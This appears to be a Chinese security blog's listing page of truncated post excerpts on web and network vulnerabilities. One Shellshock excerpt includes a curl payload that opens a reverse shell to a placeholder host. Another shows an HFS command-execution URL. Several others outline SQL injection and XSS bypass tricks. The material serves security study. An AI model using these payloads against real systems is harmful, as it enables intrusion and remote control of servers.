(转)如何发现 NTP 放大攻击漏洞
admin 10年前 (2015-08-15) 4060浏览 0评论
转自:http://drops.wooyun.org/tips/4715 NTP 漏洞相关的文章在 Drops 已经有过了,并且不止一篇,之所以又翻译了这一片文章,是觉得文章的整体思路很不错,希望对看这篇文章的你有所帮助。 BTW:本文翻译比较随意,...
admin 10年前 (2015-08-15) 4060浏览 0评论
转自:http://drops.wooyun.org/tips/4715 NTP 漏洞相关的文章在 Drops 已经有过了,并且不止一篇,之所以又翻译了这一片文章,是觉得文章的整体思路很不错,希望对看这篇文章的你有所帮助。 BTW:本文翻译比较随意,...
admin 10年前 (2015-05-06) 3957浏览 0评论
0x00 前言 首先,我们来看下整个验证码实现的原理 1.客户端发起一个请求 2.服务端响应并创建一个新的SessionID同时生成一个随机验证码。 3.服务端将验证码和SessionID一并返回给客户端 4.客户端提交验证码连同SessionI...
admin 11年前 (2014-11-14) 2584浏览 0评论
微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332),可以说是给windows吃了一颗大补丸。缺陷出现在 VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。袁哥的眼泪哗哗的。随便...
admin 11年前 (2014-11-12) 3844浏览 0评论
概述: SQLiGODS全名叫SQli Gods Syntax,实质上是一个适用于mysql数据库的concat函数。通过将联合查询注入的繁琐步骤变成网页里的一个可视化div,大大简化了手注帝们联合查询时编码解码的步骤,省时省力。 适用条件: 能够回...
admin 11年前 (2014-11-01) 2425浏览 0评论
使用PDO函数fetchAll可以进行代码执行,测试代码: <?php $db = new PDO('sqlite::memory:'); //内存中的数据库 $st = $db->query(&qu...
admin 11年前 (2014-10-07) 4963浏览 0评论
原文:http://sb.f4ck.org/thread-20348-1-1.html 1、google高级搜索intitle:ad.sangfor.com,这个问题几年前发现的,因为设计缺陷造成,现在搜到的结果比以前少很多了。 当然还有其他的手段,...
admin 11年前 (2014-09-29) 4296浏览 0评论
一、命令执行漏洞分析 利用这个漏洞,需要两个条件: 服务器收到请求后,会执行bash 执行bash的时候,会将UserAgent等设置成环境变量 同时满足这两点的,一般是使用CGI的服务器,所以受到影响的服务器份额(我语文不好)不是很大。 对它进...
admin 11年前 (2014-09-25) 5883浏览 0评论
ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...
admin 11年前 (2014-09-23) 3867浏览 0评论
转自:http://www.hackqing.com/index.asp?FoxNews=1268.html 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search=%00{.exec|cmd.} ...
admin 11年前 (2014-09-23) 4790浏览 0评论
ps:在toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。在toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。利用这些特性可以绕过xss的某些防御。 toUpperCase(): ı ==>I ſ ...
admin 11年前 (2014-09-18) 3892浏览 0评论
转自:http://t.qq.com/p/t/330573116082464 当黑客入侵服务器后留下后门,若能及时发现后门可减少不必要的损失。这里以经典的Apache模块后门 mod_rootme 为例,分享下如何从进程行为来检测Linux后门的一些...
admin 11年前 (2014-09-11) 4864浏览 0评论
本文隐藏内容 登陆 后才可以浏览 转载请注明:jinglingshu的博客 » 边信道攻击(side channel attack 简称SCA)...
admin 11年前 (2014-08-30) 2581浏览 0评论
在实际渗透场景中,有很多网络设备我们拿到了root权限后ssh登陆发现有命令执行限制, 这是因为ssh接口提供了一个特殊的受限制的命令外壳程序,类似busybox的感觉,他可以允许root用户对设备进行配置处理,但是不允许进行命令交 互,所以相当于我...
admin 11年前 (2014-08-30) 5150浏览 0评论
解释一下 ‘–tamper’ 这个参数,我百度的时候有人提到过这个参数,但是没有加以仔细说明. 在红黑联盟那里发出来的那个帖子让我一直以为是 ‘-tamper’ 而不是 ‘–tamper’ … 好忧桑啊… 直到我在 91ri 看到那个参数脚本大全的时...
admin 11年前 (2014-08-30) 30840浏览 1评论
[中秋征文] 记一次某省局被黑应急处理项目过程 我是来打酱油的,因为感觉我写的主题不是新技术。。。 1.本次渗透测试分析流程 1.1 流量异常分析 现象: 2014年5月23日下午,某省局流量异常,造成出口带宽阻塞。内部人员无法上外网。 分析: 经过...
admin 11年前 (2014-08-23) 3811浏览 0评论
一、FindFirstFile函数漏洞 1、开场 先看如下代码: <?php for ($i=0; $i<255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_ge...
admin 11年前 (2014-08-07) 5810浏览 0评论
0x00 越权漏洞 越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞 的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏...
admin 11年前 (2014-07-10) 11667浏览 0评论
0x01 下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑 – 表能跑的出 列就GG了 然后没辙 – 晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0...
admin 11年前 (2014-07-04) 1957浏览 0评论
1 中间人攻击概述 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所 谓的MITM攻击就是...
admin 11年前 (2014-07-04) 3008浏览 0评论
WVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章。 本文以8.0为例,首先呢安装好Acunetix Web Vulnerability Scanner 8...